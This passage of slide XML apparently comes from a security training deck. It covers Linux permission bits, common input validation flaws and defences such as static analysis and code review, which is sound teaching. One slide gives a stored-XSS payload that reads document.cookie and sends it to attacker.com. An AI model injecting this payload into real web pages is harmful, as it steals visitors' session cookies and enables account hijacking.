          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8464175" y="4190744"/>
            <a:ext cx="1895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orchestration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7385A-BBB5-A4D9-6352-407821CE3C6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1647897" y="6327293"/>
            <a:ext cx="436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CRI Container Runtime Interface </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20117691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D9EE7-FC2C-8F3A-0FBD-73DF2850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$ chmod  go-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>rwx</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30722" name="Picture 2" descr="Linux-based Privilege Escalation Techniques | by IBM PTC Security | Medium">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55770B30-3800-9C4F-A6AE-CF4A08A83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63" y="2185987"/>
            <a:ext cx="573405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84129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3E17-5A42-6994-2B48-F705CD30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setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> bit</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t># chmod </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>go+s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D3969-B5D6-773A-5662-F1F5C8DF1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585" y="1853366"/>
            <a:ext cx="8466554" cy="4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0136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79EE1-FE5E-A659-D2A6-366AFDCB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setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> bit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anybody</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> can "Run As" (root)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3ACE9-461D-EDCB-DF54-5F111207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197" y="2905079"/>
            <a:ext cx="8485605" cy="10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3076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E235C-4B18-2436-0256-F9A4BFC5C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NOTE ...  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Sticky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Bit  "t"   !=  "s"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t># chmod </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>g+t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361CF-F4C1-B6CB-D1CE-857CA9A4E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704" y="2000250"/>
            <a:ext cx="8356239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998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73499-D453-37E5-C0A5-EE8246120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0600-97F5-6265-BFE3-47895DD7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3010468"/>
            <a:ext cx="10515600" cy="837063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> a Work In Progress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42D4B5-F912-31A3-738B-E65C1B2F5D67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4205855"/>
            <a:ext cx="10515600" cy="837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This document </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>never</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> ends !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>see</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> more course for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>specific</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> "Data" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>concerns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642608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2574-D804-8BEB-610E-B95911A0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SQL Injection [4/4] : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ensure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Bug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written</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>compiled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>deployed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ignored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67132-4524-B146-579E-93F4A473AE4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374883" y="1816388"/>
            <a:ext cx="8296310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1/   use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>safe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>libraries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>instead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> of custom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>developments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> (do not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>reinvent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>wheel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>2/   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>recruit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> smart </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>developpers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t>train</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>them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3/   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>automatic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Quality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t> CI/CD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>SonarQube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4/   force compile-time checking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>:  use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>Static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> Code Flow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> + custom annotations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>       mark param "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>" of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>sqlExecute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>) as "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>Unsafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> SQL"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>       ...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>propagate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> marker, and check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> input web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>forms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> are not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>marked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5/   do commit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t>Code-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Reviews</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>6/   use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>tools</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>7/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>Use App </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t>firewall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>   (runtime check &amp; rewrite http API params)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016AAE-D3CF-3E61-0BA0-0E4EFEE2EF46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8359542" y="2901434"/>
            <a:ext cx="3152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https://www.sonarsource.com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A34CA-B1C9-1EB3-67AA-A8DD9FF2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985" y="3217633"/>
            <a:ext cx="1505080" cy="369602"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32772" name="Picture 4" descr="Checker Framework logo">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F556CF3-A6B2-BA1C-0C84-AA4198CD7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1" y="4460765"/>
            <a:ext cx="24860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468FDF-1FC1-4412-051C-136D626C344F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8382677" y="3986213"/>
            <a:ext cx="3827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https://checkerframework.org/  (java)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3570977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EAEDC-91F7-23D7-7AD8-0E47391AA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1F63-379A-CB70-3B06-EB888165C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6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Common "Input Validation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Errors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/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18F94-7067-C3EE-8151-62CE59B819DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4243389" y="1714501"/>
            <a:ext cx="4513864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SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>Directory Path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Traversal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Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>External</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Entity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> (XXE) Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Deserialization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etc...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68725F-AEE5-EB40-C1F3-0DB88085D8F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3686175" y="1619250"/>
            <a:ext cx="5581650" cy="7524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F48283-0503-CE9E-1790-DECE1E2708CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3786187" y="3052761"/>
            <a:ext cx="5481638" cy="363237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B8F619A-EFA1-A08D-7A68-703394120A7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3357562" y="2448718"/>
            <a:ext cx="657225" cy="4333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409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0FC9-90BE-D647-0F19-D15AF430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Cross Site Scripting (XSS, CSRF)  [1/4]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B2E42-4312-8AE0-ED85-299996AE9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785" y="1218711"/>
            <a:ext cx="5258256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4E771-F53E-BEB2-F7CC-2F389686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XSS  [2/4] : Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Payload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72C31E-28F3-8158-86DF-FF9D220A9260}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3038476" y="2190751"/>
            <a:ext cx="85064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&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>    var cookie = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>    var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> = new Image();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>img.src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> = "http://attacker.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>dummy.png?cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>=" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>encodeURIComponent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(cookie);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>&lt;/script&gt;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CE9C4-9B6F-20F3-E05C-ADF3829247CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="319089" y="2666861"/>
            <a:ext cx="402828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example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>submitted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>form</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>"comment"</a:t>
            </a:r>
          </a:p>
          <a:p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saved</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> in DB)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...re-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>opened</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>someone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t> page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>later</a:t>
            </a:r>
            <a:endParaRPr lang="fr-F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AC20E-33E8-E8E9-74AF-7DC6D0085005}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3190875" y="5286375"/>
            <a:ext cx="808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Impact </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> :   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Javascript 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executed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the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> browser, for the web-site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1997272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031A5-DD65-8EB7-9B5B-872503005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411538"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Security of Data </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>&amp; Security of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Systems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are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talking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> about ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1125823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7DE7-1C02-2325-69CD-74ED11430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XSS [3/4] : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Remediation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FA74E-B6A8-0E06-3D7B-E1FA8AE777AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4124325" y="2967038"/>
            <a:ext cx="55338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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>validate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>sanitize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>fields</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>   (at </a:t>
            </a:r>
            <a:r>
